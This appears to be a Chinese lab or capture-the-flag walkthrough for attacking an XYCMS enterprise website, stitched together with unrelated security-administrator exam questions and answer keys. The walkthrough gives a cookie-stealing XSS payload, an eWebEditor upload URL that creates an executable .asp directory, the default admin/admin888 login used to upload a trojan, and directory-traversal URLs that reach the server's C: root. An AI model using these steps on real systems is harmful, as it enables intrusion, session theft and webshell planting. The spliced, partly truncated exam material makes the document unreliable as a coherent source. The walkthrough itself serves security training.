题目21:网站漏洞攻击之XYCMS企业建站系统
信息安全管理员-初级工测试题(附答案)

信息安全管理员-初级工测试题(附答案)一、单选题(共43题,每题1分,共43分)1.在windwos操作中,可按()键取消本次操作。
A、CtrlB、ESCC、AltD、Shift正确答案:B2.Hive的默认计算引擎是什么?()A、SparkB、ImpalaC、MapReduceD、HDFS正确答案:C3.主要针对数据交互过程中提供数据、获取数据的时延要求,针对具体数据具体制定是()。
A、数据规范性标准B、数据一致性标准C、数据完整性标准D、数据及时性标准正确答案:D4.HBase依靠什么存储底层数据?()A、HDFSB、HadoopC、MemoryD、MapReduce正确答案:A5.数据状态包含数据相关系统的运行、调度、容量、性能和()。
A、访问频率B、变更C、功能D、存储正确答案:D6.物理模型的主要特征是()。
A、在统一的范式标准要求下,表、字段和关系必须和逻辑模型一致B、确定数据类型、精度、长度、约束、索引C、统一数据分类编码含义及使用规则D、以上都是正确答案:D7.下列说法正确的是()。
A、数据标准是数据质量的数据提供者B、通过元数据管理具体的操作来促进数据标准的执行情况C、数据质量指导数据标准进行有效的质量监测和检查D、数据标准向元数据提供业务元数据的标准定义正确答案:D8.在实用化自查、整改工作中,业务管理部门应根据业务系统()组织自查,自查主要采用自动化方法检查及人工抽查方法等方式进行,自查内容应涵盖系统的所有功能与流程。
A、实用化工作方案B、实用化工作计划C、实用化管理办法D、实用化评价细则正确答案:D9.根据《中国南方电网有限责任公司信息运维服务体系(2015年)》,()主要提供与计算机终端相关现场服务的工程师。
A、一线支持人员B、三线支持人员C、事件经理D、二线支持人员正确答案:D10.市面上较常见的哪种打印机的特点是打印速度快、打印品质好、工作噪音小?()。
A、激光打印机B、针式打印机C、喷墨打印机正确答案:A11.为数据分组提供在网络中路由功能的是()。
网络安全管理员模拟试题及参考答案

网络安全管理员模拟试题及参考答案一、单选题(共109题,每题1分,共109分)1.网页病毒(又称网页恶意代码)是利用网页来进行破坏的病毒,它是使用一些 SCRIPT 语言编写的恶意代码。
攻击者通常利用( )植入网页病毒。
A、拒绝服务攻击B、口令攻击C、平台漏洞D、U 盘工具正确答案:C2.因网络安全事件,发生突发事件或者生产安全事故的,应当依照《中华人民共和国突发事件应对法》、—C—等有关法律、行政法规的规定处置。
( )A、《中华人民共和国突发事件应对法》B、《中华人民共和国网络安全法》C、《中华人民共和国安全生产法》D、《中华人民共和国个人信息保护法》正确答案:C3.企业信息资产的管理和控制的描述不正确的( )A、企业应该建立和维护一个完整的信息资产清单,并明确信息资产的管控责任;B、企业应该根据信息资产的重要性和安全级别的不同要求,采取对应的管控措施C、企业的信息资产不应该分类分级,所有的信息系统要统一对待D、企业可以根据业务运作流程和信息系统拓扑结构来识别所有的信息资产正确答案:C4.以下选项中,不属于网络欺骗的作用的是( ):A、消耗人侵者的资源B、防止被入侵攻击C、影响入侵者使其按照你的意思进行选择D、迅速地检测到人侵者的进攻,并获知其进攻技术和意图正确答案:B5.下列哪一项是一个适当的测试方法适用于业务连续性计划(BCP)? ( )A、试运行B、纸面测试C、单元D、系统正确答案:B6.加密技术主要有两大类:基于对称密钥加密的算法,称为( )算法。
A、口令B、私钥C、公钥D、令牌正确答案:B7.网络入侵的主要途径有:破译口令、 IP 欺骗和 DNS 欺骗。
( )A、TFNB、SmurfC、SmrufD、DOS正确答案:B8.计算机内部采用( )表示信息。
A、八进制B、十进制C、二进制D、十六进制正确答案:C9.P2DR 模型通过传统的静态安全技术包括? ( )A、信息加密技术B、访问控制技术C、实时监控技术D、身份认证技术正确答案:C10.在计算机系统安全等级的划分中,windows NT 属于( ) 级。
信息安全管理员-初级工考试题(附参考答案)

信息安全管理员-初级工考试题(附参考答案)一、单选题(共43题,每题1分,共43分)1.备份系统是指用于数据备份的设备、部署在设备上的软件以及相关网络设备所组成,包括()、磁盘阵列、虚拟带库、物理带库等。
A、备份软件B、操作系统C、文档管理D、以上均不正确正确答案:A2.以下哪个不是运行在YARN上的计算框架()。
A、MapReduceB、OozieC、StormD、Spark正确答案:B3.PKI证书申请时,选择证书模板为()。
A、单证书模板B、双证书模板C、混合证书模板D、空模板正确答案:B4.Mapreduce属于分布式系统构成中的哪那一部分()。
A、海量存储B、流式计算C、在线计算D、离线计算正确答案:D5.《详细设计说明书》应考虑()需要,提供业务监控的接口以及提供自我诊断功能。
A、开发费用最低B、业务系统便利C、软件可拓展性D、未来系统集中统一监控正确答案:D6.目前哪种硬盘接口传输速率最快()。
A、SATAB、SASC、FCD、IDE正确答案:C7.遇到KEY丢失情况,则需要将原有的相关证书信息(),以确保系统信息安全。
A、保留B、保存C、注销D、禁用正确答案:C8.退出windows的快捷键是()。
A、Alt+F2B、Alt+F4C、Ctrl+F2D、Ctrl+F4正确答案:B9.完成项目验收后()内,档案管理人员接到归档资料与移交清单,核对归档资料,清点数量相符时,档案管理人员在归档资料移交清单签字,一式两份,接收双方各留一份。
A、一年B、半年C、三个月D、一个月正确答案:C10.发布管理主要角色有:发布经理、()和发布实施人员。
A、应用主管B、业务主管C、系统主管D、发布主管正确答案:D11.Hive的默认计算引擎是什么?()B、ImpalaC、MapReduceD、HDFS正确答案:C12.哪类存储系统有自己的文件系统:()。
A、DASB、NASC、SAND、IPSAN正确答案:B13.在展示证书列表中,选择要导出的证书后,其证书后缀名由“.cer”改为“()”,完成证书的导出。
web安全基础考试题及答案

web安全基础考试题及答案一、单项选择题(每题2分,共10分)1. 跨站脚本攻击(XSS)是一种什么样的攻击?A. 服务端攻击B. 客户端攻击C. 数据库攻击D. 网络层攻击答案:B2. SQL注入攻击主要利用了哪种漏洞?A. 操作系统漏洞B. 应用程序逻辑漏洞C. 数据库配置漏洞D. 网络协议漏洞答案:B3. HTTPS协议主要通过什么机制来保证数据传输的安全性?A. 加密B. 压缩C. 认证D. 以上都是答案:D4. 下列哪个不是Web应用的安全原则?A. 最小权限原则B. 数据加密原则C. 输入验证原则D. 信任所有用户输入答案:D5. 以下哪个不是常见的Web安全漏洞?A. CSRFB. XSSC. SQL注入D. 网络延迟答案:D二、多项选择题(每题3分,共15分)6. 以下哪些措施可以防止XSS攻击?A. 对用户输入进行编码B. 使用HTTP-only的CookieC. 限制脚本的执行D. 禁用浏览器插件答案:A, B, C7. 为了增强Web应用的安全性,以下哪些做法是正确的?A. 定期更新和打补丁B. 使用强密码策略C. 禁用不必要的服务D. 忽略安全警告答案:A, B, C8. 以下哪些是Web应用防火墙(WAF)的功能?A. 防止SQL注入B. 防止XSS攻击C. 限制请求速率D. 缓存静态内容答案:A, B, C9. 在Web安全中,以下哪些属于敏感信息?A. 用户密码B. 个人身份信息C. 支付卡信息D. 用户的浏览历史答案:A, B, C10. 以下哪些措施可以提高Web服务器的安全性?A. 禁用不必要的服务B. 定期更改服务器密码C. 使用防火墙D. 忽略安全更新答案:A, B, C三、判断题(每题1分,共5分)11. 使用HTTPS可以完全防止中间人攻击。
(错误)12. 任何情况下,都不应该在客户端存储敏感信息。
(正确)13. 为了用户体验,可以允许用户使用任何字符作为密码。
易达CMS企业建站系统漏洞0day漏洞预警电脑资料

易达CMS企业建站系统漏洞 0day漏洞预警 -电脑资料易达CMS企业建站系统漏洞0dayin注入:相关代码:........................省略一部分....................................id=request("id"):id1=Split(id,","):delid=replace(request("id"),"'","")set rs = server.createobject("adodb.recordset")sql="DELETE from shuaiweb_buycart where id in ("&delid&")"rs.open sql,dbok,3,2rs.close在结算页面处理购物车,易达CMS企业建站系统漏洞 0day漏洞预警。
相关页面:buy_settlement.asp.............................................................. ........搜索框代码问题:相关代码:function tSearchyidacms_l=request("l")yidacms_n=request("n")yidacms_y=request("yidacms_search")........................省略一部分....................................if yidacms_language = "zh" thenset rs = server.createobject("adodb.recordset")if yidacms_l = "news" thensql="select * from [shuaiweb_news] where (shuaiweb_newstitle like '%"&yidacms_n&"%' or shuaiweb_newsContent like '%"&yidacms_n&"%') and yida_language = 'ch' order by id desc"elseif yidacms_l = "products" thensql="select * from [shuaiweb_products] where(shuaiweb_productsname like '%"&yidacms_n&"%' orshuaiweb_productscontent like '%"&yidacms_n&"%' orshuaiweb_productsbprice like '%"&yidacms_n&"%' or shuaiweb_productsmodel like '%"&yidacms_n&"%') and yida_language = 'ch' order by id desc"elseif yidacms_l = "photo" thensql="select * from [shuaiweb_photo] where (shuaiweb_photoname like '%"&yidacms_n&"%') and yida_language = 'ch' order by id desc"end ifrs.open sql,dbok,1,1elseset rs = server.createobject("adodb.recordset")if yidacms_l = "news" thensql="select * from [shuaiweb_news] where (shuaiweb_newstitle like '%"&yidacms_n&"%') or (shuaiweb_newsContent like '%"&yidacms_n&"%') order by id desc"elseif yidacms_l = "products" thensql="select * from [shuaiweb_products] where(shuaiweb_productsname like '%"&yidacms_n&"%') or(shuaiweb_productscontent like '%"&yidacms_n&"%') or(shuaiweb_productsbprice like '%"&yidacms_n&"%') or(shuaiweb_productsmodel like '%"&yidacms_n&"%') order by id desc"elseif yidacms_l = "photo" thensql="select * from [shuaiweb_photo] where shuaiweb_photoname like '%"&yidacms_n&"%' order by id desc"end ifrs.open sql,dbok,1,1end ifif rs.bof and rs.eof thentSearch = tSearch & "暂无记录!"&vbcrlfElsetSearch = tSearch & ""&vbcrlfdo while not rs.eof相关页面:search.asp-----------------------------------------------------------------------------------------------会员注册逻辑错误/权限绕过相关代码:response.write ""session("shuaiweb_useremail")=emptyelseresponse.write ""response.endelseif(request("id") <> "") then id = request("id")set rs = server.createobject("adodb.recordset")user_id4 = request("id") //一样sql="DELETE * FROM shuaiweb_buy WHERE id= "&user_id4&""rs.open sql,dbok,3,2rs.updaters.closeset rs=nothingresponse.write " "End Ifend if----------------------------------------------------------------------------------------------------没测试这个sql注入,因为本地搭建时没有产品所以无法下订单,怕麻烦所以也没弄了~!这个漏洞利用起来也麻烦,电脑资料《易达CMS企业建站系统漏洞 0day漏洞预警》。
网络安全管理员技师习题(含参考答案)

网络安全管理员技师习题(含参考答案)一、单选题(共40题,每题1分,共40分)1.信息安全等级保护的5个级别中,()是最高级别,属于关系到国计民生的最关键信息系统的保护。
A、强制保护级B、监督保护级C、专控保护级D、指导保护级E、自主保护级正确答案:C2.内容过滤技术的应用领域不包括A、防火墙B、入侵检测C、网页防篡改D、防病毒正确答案:C3.syslogins这个系统表是在()中的。
A、Model库B、用户库C、Tempdb库D、Master库正确答案:D4.容易受到会话劫持攻击的是()A、SSHB、SFTPC、TELNETD、HTTPS正确答案:C5.SQL语言中的中文名称为()。
A、程序语言B、查询语言C、结构化查询语言D、结构化语言正确答案:C6.计算机的开机自检是在()里完成的。
A、CMOSB、CPUC、BIOSD、内存正确答案:B7.远程运维审计系统系统管理员、运维管理员、审计员需独立分开,不能()兼系统管理员,运维管理员,审计员。
A、三人B、二人C、一人D、以上都行正确答案:C8.如果互连的局域网高层分别采用TCP/IP协议与SPX/IPX协议,那么我们可以选择的多个网络互连设备应该是()。
A、中继器B、网桥C、网卡D、路由器正确答案:D9.二类项目内容及成果涉及或影响公司()及以上单位,由公司确定的重点项目,公司负责组织可研编制与批复、组织实施及验收。
A、一个B、四个C、三个D、两个正确答案:D10.为了使交换机故障排除工作有章可循,我们可以在故障分析时,按照()的原则来排除交换机的故障。
A、先易后难B、内而外C、由近到远D、由硬软硬正确答案:A11.现行IP地址采用的标记法是()。
A、十六进制B、十进制C、冒号十进制D、分组不能被交换正确答案:B12.下面有关我信息安全管理体制的说法错误的是A、目前我国的信息安全保障工作是相关部门各司其职、相互配合、齐抓共管的局面B、我国的信息安全保障工作综合利用法律、管理和技术的手段C、我国的信息安全管理应坚持及时检测、快速响应、综合治理的方针D、我国对于信息安全责任的原则是谁主管、谁负责;谁经营、谁负责正确答案:C13.网络运营者不得泄露、篡改、毁损其收集的个人信息;未经()同意,不得向他人提供个人信息。
1+x网络安全评估考试题及答案

1+x网络安全评估考试题及答案一、单选题(共66题,每题1分,共66分)1.下列哪一个不属于电信诈骗?A、DDOS攻击B、冒充国家相关工作人员调查唬人C、虚构退税D、假称退还养老金、抚恤金正确答案:A2.以下哪种攻击不能获取用户的会话标识?A、会话凭证B、XSSC、凭证预测D、SQL注入正确答案:D3.如果使用$_SESSION,则需要有什么注意问题A、页面编码必须是UTF-8B、保证页面不能任何输出C、首先使用session_destory()D、首先使用session_start()正确答案:D4.alert()函数是用来干什么的?A、弹窗B、打开新页面C、重新打开页面D、关闭当前页面正确答案:A5.盗取Cookie是用做什么?A、用于登录B、DDOSC、钓鱼D、会话固定正确答案:A6.Weevely是一个Kali中集成的webshell工具,它支持的语言有()。
A、ASPB、PHPC、JSPD、C/C++正确答案:B7.关于HTML格式的说法,错误的是A、<!-- -->为html的注释B、<P>用于定义一个标题C、<meta>常用于确定页面字符编码方式D、<!doctype html>用于声明文档,无大小写限制正确答案:B8.下列哪一个不属于信息安全范畴?A、运行安全B、实体安全C、人员安全D、电源安全正确答案:D9.协议的三要素不包括哪项?A、语法B、语义C、时序(同步)D、标点正确答案:D10.电信诈骗的特点不包括下列哪个?A、诈骗手段翻新速度很快B、犯罪活动的蔓延性比较大,发展很迅速C、形式集团化,反侦查能力非常强D、微信正确答案:D11.关键信息基础设施的运营者采购网络产品和服务,可能影响()的,应当通过国家网信部门会同国务院有关部门组织的国家安全审查。
A、政府安全B、信息安全C、网络安全D、国家安全正确答案:D12.Linux防火墙的主要功能是:()。
信息安全与网络攻防测试 选择题 60题

1. 以下哪项不是信息安全的基本要素?A. 机密性B. 完整性C. 可用性D. 可读性2. 在网络攻防中,什么是“零日漏洞”?A. 已公开的漏洞B. 已知但未修补的漏洞C. 未公开的漏洞D. 已修补的漏洞3. 以下哪种攻击方式主要针对网络通信的机密性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击4. 什么是DDoS攻击?A. 分布式拒绝服务攻击B. 动态数据对象服务C. 数据定义对象服务D. 动态数据库操作服务5. 以下哪种加密算法属于对称加密?A. RSAB. AESC. ECCD. DSA6. 在信息安全管理中,什么是“最小权限原则”?A. 用户应拥有尽可能多的权限B. 用户应拥有尽可能少的权限C. 用户应拥有所有权限D. 用户不应拥有任何权限7. 以下哪种协议主要用于电子邮件的安全传输?A. SSLB. TLSC. PGPD. IPSec8. 什么是SQL注入攻击?A. 通过SQL语言注入恶意代码B. 通过SQL语言注入数据C. 通过SQL语言注入命令D. 通过SQL语言注入查询9. 以下哪种攻击方式主要针对网络服务的可用性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击10. 什么是防火墙?A. 一种网络安全设备B. 一种网络存储设备C. 一种网络通信设备D. 一种网络管理设备11. 以下哪种技术用于防止数据在传输过程中被窃听?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术12. 什么是VPN?A. 虚拟专用网络B. 虚拟公共网络C. 虚拟个人网络D. 虚拟私有网络13. 以下哪种攻击方式主要针对网络通信的完整性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击14. 什么是钓鱼攻击?A. 通过伪造的电子邮件获取用户信息B. 通过伪造的网站获取用户信息C. 通过伪造的电话获取用户信息D. 通过伪造的短信获取用户信息15. 以下哪种技术用于防止数据在存储过程中被篡改?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术16. 什么是IDS?A. 入侵检测系统B. 入侵防御系统C. 入侵管理系统D. 入侵监控系统17. 以下哪种攻击方式主要针对网络通信的认证?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击18. 什么是APT攻击?A. 高级持续性威胁B. 高级临时性威胁C. 高级短暂性威胁D. 高级周期性威胁19. 以下哪种技术用于防止数据在传输过程中被篡改?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术20. 什么是WAF?A. 网络应用防火墙B. 网络访问防火墙C. 网络应用过滤器D. 网络访问过滤器21. 以下哪种攻击方式主要针对网络通信的机密性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击22. 什么是零信任安全模型?A. 信任所有用户B. 不信任所有用户C. 信任部分用户D. 不信任部分用户23. 以下哪种技术用于防止数据在存储过程中被窃听?A. 加密技术B. 认证技术C. 审计技术24. 什么是Ransomware?A. 一种加密货币B. 一种恶意软件C. 一种网络协议D. 一种网络服务25. 以下哪种攻击方式主要针对网络通信的可用性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击26. 什么是蜜罐技术?A. 一种网络安全技术B. 一种网络存储技术C. 一种网络通信技术D. 一种网络管理技术27. 以下哪种技术用于防止数据在传输过程中被篡改?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术28. 什么是MFA?A. 多因素认证B. 单因素认证C. 双因素认证D. 三因素认证29. 以下哪种攻击方式主要针对网络通信的完整性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击30. 什么是SIEM?A. 安全信息和事件管理系统B. 安全信息和事件管理服务C. 安全信息和事件管理协议D. 安全信息和事件管理工具31. 以下哪种技术用于防止数据在存储过程中被篡改?B. 认证技术C. 审计技术D. 隔离技术32. 什么是Botnet?A. 一种网络机器人B. 一种网络僵尸C. 一种网络协议D. 一种网络服务33. 以下哪种攻击方式主要针对网络通信的机密性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击34. 什么是EDR?A. 端点检测和响应B. 端点防御和响应C. 端点检测和防御D. 端点防御和检测35. 以下哪种技术用于防止数据在传输过程中被窃听?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术36. 什么是IoT?A. 物联网B. 互联网C. 互联网服务D. 互联网协议37. 以下哪种攻击方式主要针对网络通信的可用性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击38. 什么是BYOD?A. 自带设备B. 自带数据C. 自带服务D. 自带协议39. 以下哪种技术用于防止数据在存储过程中被篡改?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术40. 什么是GDPR?A. 通用数据保护条例B. 通用数据保护规则C. 通用数据保护协议D. 通用数据保护服务41. 以下哪种攻击方式主要针对网络通信的机密性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击42. 什么是SOC?A. 安全运营中心B. 安全操作中心C. 安全运营服务D. 安全操作服务43. 以下哪种技术用于防止数据在传输过程中被篡改?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术44. 什么是XSS攻击?A. 跨站脚本攻击B. 跨站请求伪造C. 跨站数据泄露D. 跨站服务拒绝45. 以下哪种攻击方式主要针对网络通信的完整性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击46. 什么是CSRF攻击?A. 跨站请求伪造B. 跨站脚本攻击C. 跨站数据泄露D. 跨站服务拒绝47. 以下哪种技术用于防止数据在存储过程中被窃听?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术48. 什么是Pharming攻击?A. 通过伪造的电子邮件获取用户信息B. 通过伪造的网站获取用户信息C. 通过伪造的电话获取用户信息D. 通过伪造的短信获取用户信息49. 以下哪种攻击方式主要针对网络通信的可用性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击50. 什么是Honeynet?A. 一种网络安全技术B. 一种网络存储技术C. 一种网络通信技术D. 一种网络管理技术51. 以下哪种技术用于防止数据在传输过程中被篡改?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术52. 什么是MDM?A. 移动设备管理B. 移动数据管理C. 移动服务管理D. 移动协议管理53. 以下哪种攻击方式主要针对网络通信的机密性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击54. 什么是SDN?A. 软件定义网络B. 软件定义服务C. 软件定义协议D. 软件定义数据55. 以下哪种技术用于防止数据在存储过程中被窃听?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术56. 什么是APT攻击?A. 高级持续性威胁B. 高级临时性威胁C. 高级短暂性威胁D. 高级周期性威胁57. 以下哪种攻击方式主要针对网络通信的可用性?A. 拒绝服务攻击B. 中间人攻击C. 社会工程学攻击D. 密码破解攻击58. 什么是IAM?A. 身份和访问管理B. 身份和认证管理C. 身份和审计管理D. 身份和隔离管理59. 以下哪种技术用于防止数据在传输过程中被篡改?A. 加密技术B. 认证技术C. 审计技术D. 隔离技术60. 什么是NAC?A. 网络访问控制B. 网络应用控制C. 网络数据控制D. 网络服务控制答案部分1. D2. C3. B4. A5. B6. B7. C8. A9. A10. A11. A12. A13. B14. B15. B16. A17. D18. A19. B20. A21. B22. B23. A24. B25. A26. A27. B28. A29. B30. A31. B32. B33. B34. A35. A36. A37. A38. A39. B40. A41. B42. A43. B44. A45. B46. A47. A48. B49. A50. A51. B52. A53. B54. A55. A56. A57. A58. A59. B60. A。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
关卡二十一
题目:
网站漏洞攻击之XYCMS企业建站系统
描述:
公司搭建了门户网站,使用了XYCMS企业建站系统。
但是经过
一段时间的运营,发现公司网站经常受到黑客的攻击,给公司
造成了很大的不便和损失。
上级领导要求尽快查清原因,作为
网络安全维护人员,请查找公司网站可能存在的一些漏洞至少
两个。
答案提交:
1、请提交获取的key值。
参考步骤:
1.进入关卡二十一,点击查看IP地址获取靶机IP
.
2.获得的靶机IP地址
3.打开场景工具Window Xp
4.进入xp渗透攻击机,打开浏览器浏览将要攻击的网站
5.SQL注入
使用“啊D注入工具”对网站进行漏洞测试
继续对注入点进行SQL注入,但没有发现可利用的信息,表明此处无漏洞。
6.XSS漏洞利用
(1)在留言本-留言标题中插入XSS脚本,
<script>window.alert(document.cookie);</script>
(2)返回带有cookie的提示窗
7.编辑器漏洞利用
(1)利用编辑器漏洞进行在网站上生产a.asp目录
http://172.16.1.62/admin/xyewebeditor/asp/upload.asp?action =save&type=image&style=popup&cusdir=a.asp
(2)编辑器管理界面的路径默认:
http://172.16.1.62/admin/xyeWebEditor/admin/login.asp 在浏览器中打开此地址
(3)输入ewebeditor默认用户名admin 密码admin888登录管理如下:
然后就可以对样式进行管理上传自己制作的木马程序
(4)编辑器默认目录遍历地址:
http://192.168.1.62/admin/xyeWebEditor/admin/upload.asp?id= 1&d_viewmode=list&dir=../并在浏览器中打开此地址
(5)利用编辑器默认目录遍历漏洞
http://192.168.1.62/admin/xyeWebEditor/admin/upload.asp?id= 1&d_viewmode=list&dir=../../../访问到C盘根目录获取的key。